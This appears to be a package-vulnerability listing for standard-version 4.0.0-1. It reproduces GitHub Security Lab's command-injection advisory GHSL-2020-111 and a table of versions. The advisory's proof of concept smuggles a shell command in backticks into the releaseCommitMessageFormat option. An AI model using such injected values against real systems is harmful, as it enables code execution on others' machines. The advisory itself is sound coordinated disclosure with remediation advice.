NodeJS/standard-version/4.0.0-1
replacement for `npm version` with automatic CHANGELOG generation
https://www.npmjs.com/package/standard-version
ISC
1 Security Vulnerabilities
Command Injection in standard-version
GitHub Security Lab (GHSL) Vulnerability Report: GHSL-2020-111
The GitHub Security Lab team has identified a potential security vulnerability in standard-version.
Summary
The standardVersion
function has a command injection vulnerability. Clients of the standard-version
library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.
Product
Standard Version
Tested Version
Commit 2f04ac8
Details
Issue 1: Command injection in standardVersion
The following proof-of-concept illustrates the vulnerability. First install Standard Version and create an empty git repo to run the PoC in:
npm install standard-version
git init
echo "foo" > foo.txt # the git repo has to be non-empty
git add foo.txt
git commit -am "initial commit"
Now create a file with the following contents:
var fs = require("fs");
// setting up a bit of environment
fs.writeFileSync("package.json", '{"name": "foo", "version": "1.0.0"}');
const standardVersion = require('standard-version')
standardVersion({
noVerify: true,
infile: 'foo.txt',
releaseCommitMessageFormat: "bla `touch exploit`"
})
and run it:
node test.js
Notice that a file named exploit
has been created.
This vulnerability is similar to command injection vulnerabilities that have been found in other Javascript libraries. Here are some examples: CVE-2020-7646, CVE-2020-7614, CVE-2020-7597, CVE-2019-10778, CVE-2019-10776, CVE-2018-16462, CVE-2018-16461, CVE-2018-16460, CVE-2018-13797, CVE-2018-3786, CVE-2018-3772, CVE-2018-3746, CVE-2017-16100, CVE-2017-16042.
We have written a CodeQL query, which automatically detects this vulnerability. You can see the results of the query on the standard-version
project here.
Impact
This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.
Remediation
We recommend not using an API that can interpret a string as a shell command. For example, use child_process.execFile
instead of child_process.exec
.
Credit
This issue was discovered and reported by GitHub Engineer @erik-krogh (Erik Krogh Kristensen).
Contact
You can contact the GHSL team at securitylab@github.com
, please include GHSL-2020-111
in any communication regarding this issue.
Disclosure Policy
This report is subject to our coordinated disclosure policy.
42 Other Versions
Version | License | Security | Released | |
---|---|---|---|---|
9.5.0 | ISC | 2022-05-15 - 13:46 | almost 2 years | |
9.3.2 | ISC | 2021-10-17 - 20:48 | over 2 years | |
9.3.1 | ISC | 2021-07-14 - 19:09 | almost 3 years | |
9.3.0 | ISC | 2021-05-04 - 16:37 | almost 3 years | |
9.2.0 | ISC | 2021-04-06 - 17:24 | about 3 years | |
9.1.1 | ISC | 2021-02-17 - 21:47 | about 3 years | |
9.1.0 | ISC | 2020-12-30 - 02:03 | over 3 years | |
9.0.0 | ISC | 2020-08-15 - 00:27 | over 3 years | |
8.0.2 | ISC | 2020-07-14 - 01:37 | almost 4 years | |
8.0.1 | ISC | 2020-07-12 - 08:12 | almost 4 years | |
8.0.0 | ISC | 1 | 2020-05-06 - 20:03 | almost 4 years |
7.1.0 | ISC | 1 | 2019-12-08 - 23:22 | over 4 years |
7.0.1 | ISC | 1 | 2019-11-07 - 22:04 | over 4 years |
7.0.0 | ISC | 1 | 2019-07-30 - 05:12 | over 4 years |
6.0.1 | ISC | 1 | 2019-05-05 - 21:55 | almost 5 years |
6.0.0 | ISC | 1 | 2019-05-05 - 21:26 | almost 5 years |
6.0.0-beta.0 | ISC | 1 | 2019-05-05 - 21:25 | almost 5 years |
5.0.2 | ISC | 1 | 2019-03-16 - 19:03 | about 5 years |
5.0.1 | ISC | 1 | 2019-02-28 - 04:11 | about 5 years |
5.0.0 | ISC | 1 | 2019-02-14 - 23:48 | about 5 years |
5.0.0-candidate.0 | ISC | 1 | 2018-11-02 - 06:55 | over 5 years |
4.4.0 | ISC | 1 | 2018-05-21 - 20:28 | almost 6 years |
4.3.0 | ISC | 1 | 2018-01-03 - 06:50 | over 6 years |
4.3.0-candidate.1 | ISC | 1 | 2018-01-03 - 05:27 | over 6 years |
4.3.0-candidate.0 | ISC | 1 | 2017-12-20 - 06:15 | over 6 years |
4.2.0 | ISC | 1 | 2017-06-12 - 22:34 | almost 7 years |
4.1.0 | ISC | 1 | 2017-06-06 - 05:14 | almost 7 years |
4.1.0-candidate.2 | ISC | 1 | 2017-06-06 - 00:12 | almost 7 years |
4.1.0-candidate.1 | ISC | 1 | 2017-06-05 - 23:31 | almost 7 years |
4.1.0-candidate.0 | ISC | 1 | 2017-06-05 - 00:05 | almost 7 years |
4.0.0 | ISC | 1 | 2016-12-02 - 11:34 | over 7 years |
4.0.0-1 | ISC | 1 | 2016-11-27 - 01:03 | over 7 years |
4.0.0-0 | ISC | 1 | 2016-11-26 - 22:26 | over 7 years |
3.0.0 | ISC | 1 | 2016-10-06 - 18:17 | over 7 years |
2.4.0 | ISC | 1 | 2016-07-13 - 17:36 | almost 8 years |
2.3.1 | ISC | 1 | 2016-06-15 - 23:04 | almost 8 years |
2.3.0 | ISC | 1 | 2016-06-02 - 17:24 | almost 8 years |
2.2.1 | ISC | 1 | 2016-05-02 - 04:26 | almost 8 years |
2.2.0 | ISC | 1 | 2016-05-02 - 00:01 | almost 8 years |
2.1.2 | ISC | 1 | 2016-04-11 - 02:20 | about 8 years |
2.1.1 | ISC | 1 | 2016-04-10 - 00:10 | about 8 years |
1.1.0 | ISC | 1 | 2016-04-08 - 23:29 | about 8 years |